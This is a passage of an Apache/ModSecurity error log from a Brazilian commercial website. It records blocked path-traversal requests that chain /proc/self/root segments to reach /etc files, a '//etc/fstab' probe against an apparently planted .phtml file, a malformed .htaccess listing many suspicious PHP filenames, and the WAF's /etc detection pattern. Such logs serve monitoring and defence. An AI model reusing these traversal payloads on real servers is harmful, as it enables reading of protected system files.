"abwNWMdf6f5d65gmYZR_EAAAAsg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:51:06.926380 2026] [:error] [pid 27403:tid 140411590858496] [client 74.7.241.31:51010] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwNWhkFeYa1D6dYQnD4AAAAAdI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:51:09.158443 2026] [:error] [pid 17653:tid 140411607643904] [client 74.7.241.31:56928] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwNXcdf6f5d65gmYZR_EgAAAtA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:51:10.619243 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.241.31:56936] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwNXta6ubjKNq_cu4ZcygAAA0c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:51:12.089815 2026] [proxy_fcgi:error] [pid 19093:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:42488] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:51:12.459299 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.241.31:56944] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwNYOoXxyEfFpUF8f8U9QAAAU8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:51:13.779908 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.241.31:56948] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwNYcdf6f5d65gmYZR_GAAAAsE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:51:16.176328 2026] [mime_magic:error] [pid 17887:tid 140411624429312] (70014)End of file found: [client 57.141.18.65:45352] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 11:51:25.964927 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.243.128:46512] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwNbeoXxyEfFpUF8f8VBQAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:51:27.864778 2026] [:error] [pid 31803:tid 140411582465792] [client 74.7.243.128:57552] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwNb-yqAr6etmhZHNpnjwAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:51:29.903383 2026] [:error] [pid 17887:tid 140411725141760] [client 74.7.243.128:38248] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwNcQkwaGbbGflqUZDLIAAAAMI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 11:51:34.125803 2026] [proxy_fcgi:error] [pid 27293:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:42952] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:51:39.159742 2026] [:error] [pid 14269:tid 140411674785536] [client 74.7.244.43:60458] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwNewbLMZ6AikZjR9VkxAAAAAg"]
[Thu Mar 19 11:51:48.345834 2026] [:error] [pid 17887:tid 140411557287680] [client 74.7.243.128:38248] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwNhAkwaGbbGflqUZDLMQAAANY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 11:51:57.133874 2026] [proxy_fcgi:error] [pid 26799:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:43424] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:52:22.125785 2026] [proxy_fcgi:error] [pid 26799:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:44078] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:52:56.129822 2026] [proxy_fcgi:error] [pid 27403:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:44814] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:53:11.792846 2026] [:error] [pid 15826:tid 140411599251200] [client 57.141.18.11:48528] [client 57.141.18.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/fstab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwN1-oXxyEfFpUF8f8VOQAAAVE"]
[Thu Mar 19 11:53:31.123220 2026] [proxy_fcgi:error] [pid 31803:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:45650] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:54:03.765818 2026] [proxy_fcgi:error] [pid 30077:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:46540] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:54:32.089905 2026] [proxy_fcgi:error] [pid 14269:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:47440] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:54:49.903290 2026] [:error] [pid 17887:tid 140411599251200] [client 74.7.243.128:38248] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwOOQkwaGbbGflqUZDLswAAANE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 11:54:59.964880 2026] [:error] [pid 14269:tid 140411666392832] [client 74.7.243.128:39670] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwOQwbLMZ6AikZjR9VlIAAAAAk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:55:06.092514 2026] [proxy_fcgi:error] [pid 26799:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:48276] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:55:17.891213 2026] [:error] [pid 19093:tid 140411716749056] [client 74.7.228.61:37158] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwOVV_V7PWP6ixUYl7EPQAAAoM"]
[Thu Mar 19 11:55:29.131925 2026] [proxy_fcgi:error] [pid 15826:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:48976] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:55:40.075634 2026] [core:alert] [pid 15826:tid 140411725141760] [client 57.141.18.76:51628] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> without matching <IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> section
[Thu Mar 19 11:55:51.126473 2026] [proxy_fcgi:error] [pid 26799:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:49564] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:56:12.562121 2026] [proxy_fcgi:error] [pid 27293:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:50082] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:56:16.694420 2026] [:error] [pid 19093:tid 140411557287680] [client 74.7.243.128:57230] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwOkF_V7PWP6ixUYl7EWAAAApY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 11:56:35.162084 2026] [proxy_fcgi:error] [pid 19093:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:50730] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:56:40.521793 2026] [:error] [pid 14269:tid 140411574073088] [client 74.7.244.43:39960] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwOqAbLMZ6AikZjR9VlZQAAABQ"]
[Thu Mar 19 11:56:54.496291 2026] [mime_magic:error] [pid 30077:tid 140411582465792] (70014)End of file found: [client 57.141.18.0:54014] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 11:56:57.125809 2026] [proxy_fcgi:error] [pid 17887:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:51422] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:57:17.283050 2026] [:error] [pid 17653:tid 140411641214720] [client 57.141.18.50:54740] [client 57.141.18.50] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc0.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwOzcdf6f5d65gmYZR_rAAAAsw"]
[Thu Mar 19 11:57:18.153793 2026] [proxy_fcgi:error] [pid 27293:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:52022] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:57:26.855633 2026] [:error] [pid 17887:tid 140411683178240] [client 74.7.243.128:41974] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwO1gkwaGbbGflqUZDMKwAAAMc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 11:57:39.133790 2026] [proxy_fcgi:error] [pid 27403:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:52516] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:58:01.073807 2026] [proxy_fcgi:error] [pid 14269:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:53108] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:58:14.186036 2026] [:error] [pid 17887:tid 140411590858496] [client 74.7.243.128:41974] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwPBgkwaGbbGflqUZDMbAAAANI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 11:58:22.203722 2026] [mime_magic:error] [pid 30077:tid 140411641214720] (70014)End of file found: [client 57.141.18.114:56376] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 11:58:27.131933 2026] [proxy_fcgi:error] [pid 15826:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:53782] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:58:29.083503 2026] [mime_magic:error] [pid 19093:tid 140411741927168] (70014)End of file found: [client 57.141.18.120:56486] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 11:58:32.752595 2026] [:error] [pid 17653:tid 140411632822016] [client 74.7.243.128:59156] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwPF8df6f5d65gmYZR_5QAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:58:50.118321 2026] [mime_magic:error] [pid 17887:tid 140411632822016] (70014)End of file found: [client 57.141.18.65:57144] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 11:58:56.506032 2026] [proxy_fcgi:error] [pid 17653:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:54432] AH01075: Error dispatching request to : (polling)
